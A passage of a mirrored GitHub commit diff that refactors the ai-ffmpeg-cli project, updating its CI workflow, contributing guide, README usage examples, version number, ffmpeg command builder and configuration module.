mirror of
https://github.com/d-k-patel/ai-ffmpeg-cli.git
synced 2025-10-09 13:42:56 +03:00
refactor: major codebase restructuring and modularization
- Reorganize core modules with improved separation of concerns
- Split context scanning into basic and extended implementations
- Consolidate security modules into dedicated credential and path security
- Replace monolithic intent schema with modular intent models
- Add comprehensive logging configuration system
- Implement new file operations and prompt enhancement modules
- Create structured test organization with unit, integration, security, and performance tests
- Remove deprecated modules and consolidate functionality
- Update CI/CD pipeline and project configuration
- Enhance documentation and contributing guidelines

This refactoring improves maintainability, testability, and modularity while preserving core functionality.
.github/workflows/ci.yml (vendored, 4 changes)
@@ -19,7 +19,7 @@ jobs:
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:
-        os: [ubuntu-latest, windows-latest, macos-latest]
+        os: [ubuntu-latest, macos-latest]
         python-version: ['3.10', '3.11', '3.12', '3.13']

     steps:
@@ -37,8 +37,6 @@ jobs:
           sudo apt update && sudo apt install -y ffmpeg
         elif [[ "${{ matrix.os }}" == "macos-latest" ]]; then
           brew install ffmpeg
-        elif [[ "${{ matrix.os }}" == "windows-latest" ]]; then
-          choco install ffmpeg
         fi

       - name: Cache dependencies
CHANGELOG.md (102 changes)
@@ -1,102 +0,0 @@
# Changelog

All notable changes to aiclip will be documented in this file.

The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

## [Unreleased]

### Added
- Upcoming features will be listed here

### Changed
- Upcoming changes will be listed here

### Fixed
- Upcoming fixes will be listed here

## [0.1.3] - 2025-08-19

### Fixed
- CLI crash on `--help` due to unsupported `Optional[typer.Context]` annotation. Refactored callback to require `Context` and added an internal wrapper for tests.

### Changed
- Documentation updates clarifying correct usage of global options and subcommands. Added examples for `nl` subcommand and a note to avoid invoking the binary twice.

## [0.1.4] - 2025-08-19

### Documentation
- Fix README first command section formatting (interactive vs one-shot examples) and minor spacing in table snippet.

## [0.1.0] - 2024-01-XX

### Added
- 🎬 Initial release of aiclip
- 🤖 AI-powered natural language to ffmpeg command translation
- 🔒 Safety-first approach with command preview before execution
- ⚡ Support for common video operations:
  - Video format conversion (mov, mp4, etc.)
  - Video scaling and resolution changes
  - Video compression with quality control
  - Audio extraction and removal
  - Video trimming and segmentation
  - Thumbnail and frame extraction
  - Video overlay and watermarking
  - Batch processing with glob patterns

### Features
- Interactive CLI mode for iterative workflows
- One-shot command execution for automation
- Smart defaults for codecs and quality settings
- Context scanning for automatic file detection
- Comprehensive error handling with helpful messages
- Overwrite protection for existing files
- Rich terminal output with formatted tables
- Configurable AI models (GPT-4o, GPT-4o-mini)
- Environment-based configuration
- Dry-run mode for command preview
- Verbose logging for debugging

### Technical
- Python 3.10+ support
- Built with Typer for CLI framework
- OpenAI GPT integration for natural language processing
- Pydantic for robust data validation
- Rich for beautiful terminal output
- Comprehensive test suite with pytest
- Code quality tools (ruff, mypy)
- Docker support
- GitHub Actions CI/CD pipeline

### Documentation
- Comprehensive README with examples
- API documentation
- Contributing guidelines
- Development setup instructions

---

## Release Notes Template

When preparing a new release, copy this template:

### [X.Y.Z] - YYYY-MM-DD

#### Added
- New features

#### Changed
- Changes in existing functionality

#### Deprecated
- Soon-to-be removed features

#### Removed
- Now removed features

#### Fixed
- Bug fixes

#### Security
- Vulnerability fixes
CONTRIBUTING.md (405 changes)
@@ -1,103 +1,374 @@
# Contributing to aiclip
# Contributing to ai-ffmpeg-cli

Thank you for your interest in contributing to aiclip! 🎉
Thank you for your interest in contributing to ai-ffmpeg-cli! This document provides guidelines and information for contributors.

We welcome contributions of all kinds:
- 🐛 Bug reports and fixes
- ✨ New features and enhancements
- 📖 Documentation improvements
- 🧪 Tests and quality improvements
- 💡 Ideas and suggestions
## 🤝 How to Contribute

## Quick Start
We welcome contributions from the community! Here are the main ways you can help:

1. **Fork & Clone**
### 🐛 Bug Reports

Found a bug? Please report it! Before creating an issue:

1. **Check existing issues** - Search for similar problems
2. **Provide details** - Include error messages, steps to reproduce, and system info
3. **Test with latest version** - Ensure you're using the most recent release

**Bug report template:**
```markdown
## Bug Description
Brief description of the issue

## Steps to Reproduce
1. Run command: `aiclip "your command here"`
2. Expected: [what should happen]
3. Actual: [what actually happened]

## Environment
- OS: [macOS/Windows/Linux]
- Python version: [3.10+]
- ai-ffmpeg-cli version: [version]
- ffmpeg version: [version]

## Error Messages
```
[Paste any error messages here]
```

## Additional Context
Any other relevant information
```

### 💡 Feature Requests

Have an idea for a new feature? We'd love to hear it!

**Feature request template:**
```markdown
## Feature Description
Brief description of the feature

## Use Case
How would this feature be used? What problem does it solve?

## Proposed Implementation
Any thoughts on how this could be implemented?

## Alternatives Considered
Are there other ways to solve this problem?
```

### 📝 Documentation

Help improve our documentation! Areas that need attention:

- **README.md** - Main project documentation
- **Code comments** - Inline documentation
- **Examples** - Usage examples and tutorials
- **Troubleshooting** - Common issues and solutions

### 🧪 Testing

Help us maintain code quality by:

- **Writing tests** - Add tests for new features
- **Running tests** - Ensure existing tests pass
- **Test coverage** - Improve test coverage

### 🔧 Code Contributions

Ready to write code? Here's how to get started:

## 🛠️ Development Setup

### Prerequisites

- **Python 3.10+**
- **ffmpeg** installed and in PATH
- **Git** for version control
- **OpenAI API key** for testing
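A quick way to verify these prerequisites from Python is a small check script. This is an illustrative sketch only; `check_prerequisites` is a hypothetical helper, not part of the codebase:

```python
import os
import shutil


def check_prerequisites() -> list[str]:
    """Return the names of missing development prerequisites."""
    missing = []
    # ffmpeg must be discoverable on PATH for the CLI to work
    if shutil.which("ffmpeg") is None:
        missing.append("ffmpeg")
    # an OpenAI API key is needed for tests that hit the live API
    if not os.environ.get("OPENAI_API_KEY"):
        missing.append("OPENAI_API_KEY")
    return missing


print(check_prerequisites())
```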
### Local Development

1. **Clone the repository**
```bash
git clone https://github.com/yourusername/ai-ffmpeg-cli.git
git clone https://github.com/d-k-patel/ai-ffmpeg-cli.git
cd ai-ffmpeg-cli
```

2. **Setup Development Environment**
2. **Set up virtual environment**
```bash
make setup
source .venv/bin/activate
python -m venv .venv
source .venv/bin/activate # On Windows: .venv\Scripts\activate
```

3. **Run Tests**
3. **Install dependencies**
```bash
make test
make lint
pip install -e ".[dev]"
```

4. **Make Changes & Test**
4. **Set up environment variables**
```bash
# Make your changes
make test # Ensure tests pass
make format # Format code
make demo # Test functionality
cp .env.sample .env
# Edit .env with your OpenAI API key
```

5. **Submit Pull Request**
- Create a feature branch
- Make your changes with tests
- Update documentation if needed
- Submit PR with clear description
5. **Run tests**
```bash
pytest
```

## Development Workflow
### Project Structure

### Testing
```bash
make test # Run all tests
make test-cov # Run with coverage
make demo # Manual testing
```
ai-ffmpeg-cli/
├── src/ai_ffmpeg_cli/ # Main source code
│ ├── __init__.py
│ ├── main.py # CLI entry point
│ ├── config.py # Configuration management
│ ├── llm_client.py # AI model integration
│ ├── intent_router.py # Command routing
│ ├── executor.py # Command execution
│ ├── prompt_enhancer.py # Prompt optimization
│ ├── context_scanner.py # File context scanning
│ └── path_security.py # Security validation
├── tests/ # Test suite
├── docs/ # Documentation
├── assets/ # Images and resources
└── README.md # Project documentation
```

### Code Quality
## 📋 Coding Standards

### Python Style Guide

We follow [PEP 8](https://pep8.org/) with some modifications:

- **Line length**: 88 characters (Black formatter)
- **Type hints**: Required for all functions
- **Docstrings**: Google style for all public functions
- **Imports**: Organized with `isort`

### Code Quality Tools

We use several tools to maintain code quality:

```bash
make lint # Check code quality
make format # Auto-format code
make security # Security checks
# Format code
black src/ tests/
isort src/ tests/

# Lint code
flake8 src/ tests/
mypy src/

# Run all quality checks
make lint
```

### Testing Guidelines

- **Test coverage**: Aim for >90% coverage
- **Test types**: Unit tests, integration tests, and CLI tests
- **Test naming**: Descriptive test names that explain the scenario
- **Fixtures**: Use pytest fixtures for common setup

**Example test structure:**
```python
def test_feature_name_success_case():
    """Test that feature works correctly in normal case."""
    # Arrange
    input_data = "test input"

    # Act
    result = function_under_test(input_data)

    # Assert
    assert result == expected_output
```

## 🔄 Pull Request Process

### Before Submitting
```bash
make pre-commit # Run all checks

1. **Create a feature branch**
```bash
git checkout -b feature/your-feature-name
```

2. **Make your changes**
- Write code following our standards
- Add tests for new functionality
- Update documentation if needed

3. **Run quality checks**
```bash
make lint
make test
```

4. **Commit your changes**
```bash
git add .
git commit -m "feat: add new feature description"
```

### Commit Message Format

We use [Conventional Commits](https://www.conventionalcommits.org/):

```
type(scope): description

[optional body]

[optional footer]
```

## Contribution Guidelines
**Types:**
- `feat`: New feature
- `fix`: Bug fix
- `docs`: Documentation changes
- `style`: Code style changes (formatting, etc.)
- `refactor`: Code refactoring
- `test`: Adding or updating tests
- `chore`: Maintenance tasks

### Bug Reports
Please include:
- Clear description of the issue
- Steps to reproduce
- Expected vs actual behavior
- Your environment (OS, Python version, ffmpeg version)
- Example command that fails
**Examples:**
```
feat(cli): add --output-dir option for custom output directory
fix(llm): resolve duration parameter not being applied to GIFs
docs(readme): update installation instructions
test(executor): add tests for command validation
```
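This commit-subject format is easy to lint in a hook. A minimal sketch, using the types listed above (the regex and `is_conventional` helper are illustrative, not project code):

```python
import re

# Commit types accepted per the guide above
TYPES = ("feat", "fix", "docs", "style", "refactor", "test", "chore")

# type, optional (scope), then ": description"
COMMIT_RE = re.compile(r"^(?:" + "|".join(TYPES) + r")(?:\([a-z0-9_-]+\))?: .+")


def is_conventional(subject: str) -> bool:
    """Check a commit subject line against the Conventional Commits shape."""
    return COMMIT_RE.match(subject) is not None


print(is_conventional("feat(cli): add --output-dir option"))  # True
print(is_conventional("update stuff"))  # False
```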
### Feature Requests
- Describe the use case
- Explain why it would be valuable
- Provide example usage if possible
### Pull Request Guidelines

### Code Contributions
- Follow existing code style
- Add tests for new functionality
- Update documentation
- Keep commits focused and descriptive
1. **Title**: Clear, descriptive title
2. **Description**: Explain what and why (not how)
3. **Related issues**: Link to any related issues
4. **Screenshots**: Include screenshots for UI changes
5. **Testing**: Describe how to test your changes

## Code Style
**PR template:**
```markdown
## Description
Brief description of changes

We use:
- **ruff** for linting and formatting
- **mypy** for type checking
- **pytest** for testing
## Type of Change
- [ ] Bug fix
- [ ] New feature
- [ ] Documentation update
- [ ] Test addition/update
- [ ] Other (please describe)

Run `make format` to auto-format your code.
## Testing
- [ ] All tests pass
- [ ] New tests added for new functionality
- [ ] Manual testing completed

## Questions?
## Checklist
- [ ] Code follows style guidelines
- [ ] Self-review completed
- [ ] Documentation updated
- [ ] No breaking changes (or breaking changes documented)
```

- 💬 **Discussions**: Use GitHub Discussions for questions
- 🐛 **Issues**: Use GitHub Issues for bugs
- 📧 **Email**: Contact maintainers directly for sensitive issues
## 🎯 Areas for Contribution

### High Priority

- **Duration handling improvements** - Better support for time-based requests
- **Error handling** - More user-friendly error messages
- **Performance optimization** - Faster command generation
- **Test coverage** - Improve test coverage for edge cases

### Medium Priority

- **New ffmpeg operations** - Support for more complex operations
- **UI improvements** - Better interactive mode experience
- **Documentation** - More examples and tutorials
- **Integration tests** - End-to-end testing

### Low Priority

- **Performance monitoring** - Metrics and analytics
- **Plugin system** - Extensibility framework
- **GUI mode** - Visual interface
- **Batch processing** - Multi-file operations

## 🐛 Common Issues

### Development Environment

**"Module not found" errors**
```bash
# Ensure you're in the virtual environment
source .venv/bin/activate

# Install in development mode
pip install -e ".[dev]"
```

**"ffmpeg not found"**
```bash
# Install ffmpeg
brew install ffmpeg # macOS
sudo apt install ffmpeg # Ubuntu
# Windows: download from ffmpeg.org
```

**"OpenAI API key required"**
```bash
# Set environment variable
export OPENAI_API_KEY="your-key-here"

# Or add to .env file
echo "OPENAI_API_KEY=your-key-here" >> .env
```

### Testing Issues

**"Tests failing"**
```bash
# Run with verbose output
pytest -v

# Run specific test file
pytest tests/test_specific.py

# Run with coverage
pytest --cov=src/ai_ffmpeg_cli
```

## Getting Help

### Community Support

- **GitHub Issues**: For bugs and feature requests
- **GitHub Discussions**: For questions and general discussion

### Development Questions

- **Code reviews**: Ask questions in PR comments
- **Architecture decisions**: Open a discussion
- **Implementation help**: Create an issue with "help wanted" label

## 🏆 Recognition

We appreciate all contributions! Contributors will be:

- **Listed in contributors** - Added to the project contributors list
- **Mentioned in releases** - Credit in release notes
- **Invited to discussions** - Participate in project decisions

## 📄 License

By contributing to ai-ffmpeg-cli, you agree that your contributions will be licensed under the MIT License.

---

Thank you for contributing to ai-ffmpeg-cli! 🎬

Your contributions help make video processing easier for everyone.

Thank you for contributing! 🚀
README.md (132 changes)
@@ -1,14 +1,19 @@
# 🎬 aiclip
# 🎬 ai-ffmpeg-cli

[](https://badge.fury.io/py/ai-ffmpeg-cli)
[](https://pepy.tech/projects/ai-ffmpeg-cli)
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
[](https://codecov.io/github/d-k-patel/ai-ffmpeg-cli)
[](https://github.com/d-k-patel/ai-ffmpeg-cli/actions)

> **Stop Googling ffmpeg commands. Just describe what you want.**

**aiclip** is an AI-powered CLI that translates natural language into safe, previewable `ffmpeg` commands. Built for developers, content creators, and anyone who works with media files but doesn't want to memorize complex syntax.


## ✨ Why aiclip?
**ai-ffmpeg-cli** is an AI-powered CLI that translates natural language into safe, previewable `ffmpeg` commands. Built for developers, content creators, and anyone who works with media files but doesn't want to memorize complex syntax.

## ✨ Why ai-ffmpeg-cli?

- 🤖 **AI-Native**: Translate plain English to perfect ffmpeg commands
- 🔒 **Safety First**: Preview every command before execution
@@ -20,7 +25,7 @@
# Instead of this...
ffmpeg -i input.mp4 -vf "scale=1280:720" -c:v libx264 -c:a aac -b:v 2000k output.mp4

# Just say this...
# Just say this... (cli command is different)
aiclip "convert input.mp4 to 720p with good quality"
```

@@ -31,9 +36,6 @@ aiclip "convert input.mp4 to 720p with good quality"
```bash
# Install from PyPI
pip install ai-ffmpeg-cli

# Or with Homebrew (coming soon)
brew install aiclip
```

### Setup
@@ -55,13 +57,43 @@ aiclip
```

```text
convert this video to 720p
┌───┬──────────────────────────────────────────────────────────┐
│ # │ Command                                                  │
├───┼──────────────────────────────────────────────────────────┤
│ 1 │ ffmpeg -i input.mp4 -vf scale=1280:720 -c:v libx264...   │
└───┴──────────────────────────────────────────────────────────┘
Run these commands? [Y/n]
╭─────────────────────────────────────── Welcome to Interactive Mode ───────────────────────────────────────╮
│                                                                                                           │
│ ai-ffmpeg-cli v0.2.2                                                                                      │
│                                                                                                           │
│ AI-powered video and audio processing with natural language                                               │
│ Type your request in plain English and let AI handle the ffmpeg complexity!                               │
│                                                                                                           │
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────╯

Available Media Files
┏━━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Type   ┃ Count ┃ Files                          ┃
┡━━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ Videos │ 1     │ • input.mp4                    │
│ Images │ 2     │ • logo.png                     │
│        │       │ • watermark.png                │
└────────┴───────┴────────────────────────────────┘

╭────────────────────────────────────────── Output Configuration ───────────────────────────────────────────╮
│ Output Directory: /path/to/your/aiclip                                                                    │
│ Generated files will be saved here                                                                        │
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────╯

aiclip> convert this video to 720p

┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━┓
┃ # ┃ Command                                      ┃ Output                                        ┃ Status ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━┩
│ 1 │ ffmpeg -i input.mp4 -vf scale=1280:720...    │ /path/to/your/aiclip/input_720p.mp4           │ New    │
└───┴──────────────────────────────────────────────┴───────────────────────────────────────────────┴────────┘

╭────────────────────────────────────────── Confirmation Required ──────────────────────────────────────────╮
│                                                                                                           │
│ Run these commands?                                                                                       │
│                                                                                                           │
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────╯
[y/n]: Using default: Y
```

Or run a one-shot command (no interactive prompt):
@@ -84,6 +116,10 @@ aiclip "make input.mp4 1080p resolution"
# Compress files
aiclip "compress large-video.mp4 to smaller size"
aiclip "reduce file size with CRF 23"

# Create animated GIFs
aiclip "convert input.mp4 to animated gif"
aiclip "create a 5 second animated gif from video.mp4"
```

### Audio Operations
@@ -145,6 +181,9 @@ aiclip --timeout 120 "complex processing task"

# Verbose logging for troubleshooting
aiclip --verbose "your command"

# Specify custom output directory
aiclip --output-dir /path/to/output "convert video.mp4 to 720p"
```

### Subcommands and option placement
@@ -174,6 +213,7 @@ OPENAI_API_KEY=sk-your-openai-api-key
# Optional
AICLIP_MODEL=gpt-4o # AI model to use
AICLIP_DRY_RUN=false # Preview commands by default
AICLIP_OUTPUT_DIR=aiclip # Default output directory
```
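Reading these variables with their documented defaults might look like the following sketch (the real config module uses pydantic and validates the API key; this only illustrates the fallback behavior):

```python
import os


def load_settings(env=None) -> dict:
    """Read aiclip settings from environment variables, falling back to defaults."""
    env = os.environ if env is None else env
    return {
        "model": env.get("AICLIP_MODEL", "gpt-4o"),
        "dry_run": env.get("AICLIP_DRY_RUN", "false").lower() == "true",
        "output_dir": env.get("AICLIP_OUTPUT_DIR", "aiclip"),
    }


print(load_settings({}))  # all defaults
```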
## 🎯 Smart Defaults & Safety
@@ -183,6 +223,56 @@ AICLIP_DRY_RUN=false # Preview commands by default
- **Sensible Codecs**: Automatically chooses h264+aac for MP4, libx265 for compression
- **Stream Copy**: Uses `-c copy` for trimming when possible (faster, lossless)
- **Context Aware**: Scans your directory to suggest input files and durations
- **Organized Output**: All generated files are saved to a dedicated output directory
- **Duration Support**: Automatically handles time-based requests (e.g., "5 second GIF")
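The stream-copy default can be illustrated as an argv list in the style the command builder produces. A sketch under assumptions; `build_trim_command` is a hypothetical helper, not project code:

```python
def build_trim_command(src: str, start: str, duration: str, dst: str) -> list[str]:
    """Trim without re-encoding: seek flags before -i, then stream copy."""
    # -ss/-t before -i make the seek fast; -c copy avoids a lossy re-encode
    return ["ffmpeg", "-ss", start, "-t", duration, "-i", src, "-c", "copy", dst]


cmd = build_trim_command("input.mp4", "00:00:10", "30", "clip.mp4")
print(" ".join(cmd))
```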
## 📁 Output Directory Management

aiclip automatically organizes all generated files in a dedicated output directory:

```bash
# Default behavior - files saved to "aiclip" folder
aiclip "convert video.mp4 to 720p"
# Output: ./aiclip/video_720p.mp4

# Custom output directory
aiclip --output-dir /path/to/output "convert video.mp4 to 720p"
# Output: /path/to/output/video_720p.mp4

# Environment variable configuration
export AICLIP_OUTPUT_DIR=my_outputs
aiclip "convert video.mp4 to 720p"
# Output: ./my_outputs/video_720p.mp4
```

**Benefits:**
- 🗂️ **Organized**: All generated files in one place
- 🔍 **Easy to find**: No more searching through mixed directories
- 🧹 **Clean workspace**: Input files stay separate from outputs
- 📊 **Progress tracking**: See all your generated files at a glance
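The naming scheme shown above (input stem plus a suffix, placed inside the output directory) can be sketched with pathlib. Illustrative only; the actual naming logic may differ:

```python
from pathlib import Path


def output_path(input_file: str, suffix: str, output_dir: str = "aiclip") -> Path:
    """Derive an output path like aiclip/video_720p.mp4 from the input name."""
    src = Path(input_file)
    # keep the stem and extension, append the operation suffix
    return Path(output_dir) / f"{src.stem}_{suffix}{src.suffix}"


print(output_path("video.mp4", "720p"))
```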
## ⏱️ Duration and Time Handling

aiclip intelligently handles time-based requests for video and GIF creation:

```bash
# Create GIFs with specific duration
aiclip "convert video.mp4 to 5 second animated gif"
aiclip "create a 10 second animated gif from input.mp4"

# Time-based video operations
aiclip "extract first 30 seconds from video.mp4"
aiclip "create 15 second clip from input.mp4"

# Thumbnails at specific times
aiclip "extract frame at 2:30 from video.mp4"
aiclip "create thumbnail at 10 seconds from input.mp4"
```

**Supported time formats:**
- **Seconds**: "5 second", "10s", "30 seconds"
- **Time codes**: "2:30", "1:45:30", "00:02:15"
- **Duration**: "5 second duration", "10 second clip"
## 📊 Supported Operations

@@ -196,12 +286,13 @@ AICLIP_DRY_RUN=false # Preview commands by default
| **Thumbnail** | "frame at 10s" | `-ss 00:00:10 -vframes 1` |
| **Overlay** | "watermark top-right" | `-filter_complex overlay=W-w-10:10` |
| **Batch** | "all *.mov files" | Shell loops with glob patterns |
| **GIF Creation** | "animated gif", "5 second gif" | `-vf fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse -c:v gif` |
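The GIF filter graph from the table can be assembled programmatically. A sketch in the command builder's argv-list style; `build_gif_command` and its `fps`/`width` parameters are assumptions for illustration:

```python
def build_gif_command(src: str, dst: str, fps: int = 10, width: int = 320) -> list[str]:
    """High-quality GIF via palette generation, as a single filter graph."""
    # split the stream, generate a palette from one branch, apply it to the other
    vf = (
        f"fps={fps},scale={width}:-1:flags=lanczos,"
        "split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse"
    )
    return ["ffmpeg", "-i", src, "-vf", vf, "-c:v", "gif", dst]


print(" ".join(build_gif_command("input.mp4", "out.gif")))
```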
## 🛠️ Development

```bash
# Clone and setup
git clone https://github.com/yourusername/ai-ffmpeg-cli.git
git clone https://github.com/d-k-patel/ai-ffmpeg-cli.git
cd ai-ffmpeg-cli
make setup

@@ -254,12 +345,17 @@ sudo apt install ffmpeg # Ubuntu
- Check file extensions match your request
- Use `ls` to verify available files

**"Duration not applied to GIF/video"**
- Be explicit about duration: "5 second animated gif"
- Use clear time specifications: "10 second video clip"
- Check that the AI model includes duration in the generated command

### Getting Help

- 📖 **Documentation**: Full guides at [docs link]
- 💬 **Discord**: Join our community for real-time help
- 🐛 **Issues**: Report bugs on [GitHub Issues](https://github.com/yourusername/ai-ffmpeg-cli/issues)
- 💡 **Discussions**: Feature requests and Q&A on [GitHub Discussions](https://github.com/yourusername/ai-ffmpeg-cli/discussions)
- 🐛 **Issues**: Report bugs on [GitHub Issues](https://github.com/d-k-patel/ai-ffmpeg-cli/issues)
- 💡 **Discussions**: Feature requests and Q&A on [GitHub Discussions](https://github.com/d-k-patel/ai-ffmpeg-cli/discussions)

## 🤝 Contributing

@@ -280,6 +376,8 @@ See our [Contributing Guide](CONTRIBUTING.md) to get started.
- ⚡ **Local Models**: Run without internet using local AI
- 🏢 **Team Features**: Shared commands and analytics
- 🔌 **Integrations**: GitHub Actions, Docker, CI/CD pipelines
- 🎬 **Enhanced Duration Support**: Better handling of time-based requests
- 📁 **Advanced Output Management**: Custom naming patterns and organization

## 📄 License
pyproject.toml

@@ -4,7 +4,7 @@ build-backend = "hatchling.build"

 [project]
 name = "ai-ffmpeg-cli"
-version = "0.1.4"
+version = "0.2.3"
 description = "AI-powered CLI that translates natural language to safe ffmpeg commands"
 readme = { file = "README.md", content-type = "text/markdown" }
 license = { file = "LICENSE" }
@@ -47,7 +47,7 @@ classifiers = [
 ]

 dependencies = [
-    "typer[all]>=0.9.0",
+    "typer>=0.9.0",
     "rich>=13.0.0",
     "openai>=1.37.0",
     "python-dotenv>=1.0.0",
@@ -1,3 +1,3 @@
-from .version import __version__
+from .version_info import __version__

 __all__ = ["__version__"]
@@ -1,15 +1,34 @@
|
||||
"""Command builder for ai-ffmpeg-cli.
|
||||
|
||||
This module converts command plans into executable ffmpeg command lists,
|
||||
applying appropriate defaults and ensuring proper argument ordering.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from typing import TYPE_CHECKING
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from .nl_schema import CommandPlan
|
||||
from .intent_models import CommandPlan
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str]]:
|
||||
"""Build executable ffmpeg commands from a command plan.
|
||||
|
||||
    Converts a CommandPlan into a list of executable ffmpeg command lists,
    applying appropriate defaults and ensuring proper argument ordering
    for optimal performance and compatibility.

    Args:
        plan: Command plan containing entries to convert
        assume_yes: Whether to add -y flag to overwrite output files

    Returns:
        List of ffmpeg command argument lists ready for execution
    """
    commands: list[list[str]] = []
    for entry in plan.entries:
        cmd: list[str] = ["ffmpeg"]
@@ -22,7 +41,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
        post_input_flags: list[str] = []

        # Split args into pre/post by presence of -ss/-t/-to which are often pre-input
        # Keep order stable otherwise
        # Keep order stable otherwise for predictable command generation
        for i in range(0, len(entry.args), 2):
            flag = entry.args[i]
            val = entry.args[i + 1] if i + 1 < len(entry.args) else None
@@ -31,6 +50,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
            if val is not None:
                bucket.append(val)

        # Build command with proper flag ordering
        cmd.extend(pre_input_flags)
        cmd.extend(["-i", str(entry.input)])
        for extra in entry.extra_inputs:
@@ -47,7 +67,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
        # Apply broad defaults below.

        if "-vframes" in entry.args:
            # thumbnail
            # thumbnail action detected
            pass

        # If overlay is intended, builder must add filter_complex
@@ -73,7 +93,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
        if "compress" in summary and "-crf" not in existing_args_str:
            cmd.extend(["-crf", "28"])
        if "frames" in summary and "fps=" not in existing_args_str:
            # default fps = 1/5
            # default fps = 1/5 for frame extraction
            cmd.extend(["-vf", "fps=1/5"])
        if "overlay" in summary and "-filter_complex" not in entry.args:
            # default top-right overlay with 10px margins
@@ -89,8 +109,8 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str

        cmd.append(str(entry.output))

        # Validate the command before adding it
        from .io_utils import validate_ffmpeg_command
        # Validate the command before adding it for security
        from .file_operations import validate_ffmpeg_command

        if not validate_ffmpeg_command(cmd):
            logger.warning(f"Generated command failed validation: {' '.join(cmd[:5])}...")
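The pre-/post-input split in the hunk above matters because ffmpeg treats `-ss`/`-t`/`-to` placed before `-i` as fast input-side seeking. A minimal standalone sketch of that bucketing, assuming the flat `[flag, value, ...]` layout the hunk iterates over (the helper name is illustrative, not the builder's actual API):

```python
# Flags the hunk above routes before -i; everything else goes after the input.
PRE_INPUT_FLAGS = {"-ss", "-t", "-to"}


def split_args(args: list[str]) -> tuple[list[str], list[str]]:
    """Split a flat [flag, value, flag, value, ...] list into pre/post buckets."""
    pre: list[str] = []
    post: list[str] = []
    for i in range(0, len(args), 2):
        flag = args[i]
        val = args[i + 1] if i + 1 < len(args) else None
        bucket = pre if flag in PRE_INPUT_FLAGS else post
        bucket.append(flag)
        if val is not None:
            bucket.append(val)
    return pre, post


print(split_args(["-ss", "10", "-c:v", "libx264"]))
# (['-ss', '10'], ['-c:v', 'libx264'])
```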
@@ -1,3 +1,9 @@
"""Configuration management for ai-ffmpeg-cli.

This module handles loading, validation, and management of application
configuration from environment variables and .env files.
"""

from __future__ import annotations

import os
@@ -9,35 +15,41 @@ from pydantic import Field
from pydantic import ValidationError
from pydantic import field_validator

from .errors import ConfigError
from .security import create_secure_logger
from .security import mask_api_key
from .security import validate_api_key_format
from .credential_security import create_secure_logger
from .credential_security import mask_api_key
from .credential_security import validate_api_key_format
from .custom_exceptions import ConfigError

# Create secure logger that masks sensitive information
logger = create_secure_logger(__name__)


class AppConfig(BaseModel):
    """Runtime configuration loaded from environment variables.

    Provides a centralized configuration interface with validation
    and secure handling of sensitive data like API keys.

    Attributes
    ----------
    openai_api_key: SecretStr
        API key for OpenAI provider. Securely wrapped to prevent accidental exposure.
    openai_api_key: str | None
        API key for OpenAI provider. Can be None if not set.
    model: str
        Model name to use for parsing intents.
        Model name to use for parsing intents (default: gpt-5).
    dry_run: bool
        If True, only preview commands and do not execute.
    confirm_default: bool
        Default value for confirmation prompts (True means default Yes).
    timeout_seconds: int
        Timeout in seconds for LLM parsing requests.
        Timeout in seconds for LLM parsing requests (1-300 seconds).
    max_file_size: int
        Maximum allowed file size in bytes (default: 500MB).
    allowed_directories: list[str]
        List of directories where file operations are allowed.
    rate_limit_requests: int
        Maximum API requests per minute.
        Maximum API requests per minute (1-1000).
    output_directory: str
        Directory where generated output assets will be stored (default: "aiclip").
    """

    openai_api_key: str | None = Field(default=None)
@@ -50,16 +62,33 @@ class AppConfig(BaseModel):
    max_file_size: int = Field(default=500 * 1024 * 1024)  # 500MB
    allowed_directories: list[str] = Field(default_factory=lambda: [os.getcwd()])
    rate_limit_requests: int = Field(default=60, ge=1, le=1000)  # requests per minute
    output_directory: str = Field(default="aiclip")

    @field_validator("model")
    @classmethod
    def validate_model(cls, v: str) -> str:
        """Validate model name format."""
        """Validate model name format and warn about non-standard models.

        Ensures the model name is valid and warns when using models
        not in the standard allowed list.

        Args:
            v: Model name to validate

        Returns:
            Validated model name

        Raises:
            ValueError: When model name is empty or invalid
        """
        if not v or not isinstance(v, str):
            raise ValueError("Model name is required")

        # Allow common OpenAI models
        allowed_models = {
            "gpt-5",
            "gpt-5-mini",
            "gpt-5-nano",
            "gpt-4o",
            "gpt-4o-mini",
            "gpt-4",
@@ -76,7 +105,17 @@ class AppConfig(BaseModel):
    @field_validator("allowed_directories", mode="before")
    @classmethod
    def validate_directories(cls, v: list[str] | str) -> list[str]:
        """Validate and normalize allowed directories."""
        """Validate and normalize allowed directories.

        Converts string input to list, validates directory existence,
        and provides fallback to current directory if no valid directories.

        Args:
            v: Directory path(s) as string or list of strings

        Returns:
            List of validated absolute directory paths
        """
        if isinstance(v, str):
            v = [v]

@@ -97,15 +136,68 @@ class AppConfig(BaseModel):

        return validated_dirs

    @field_validator("output_directory")
    @classmethod
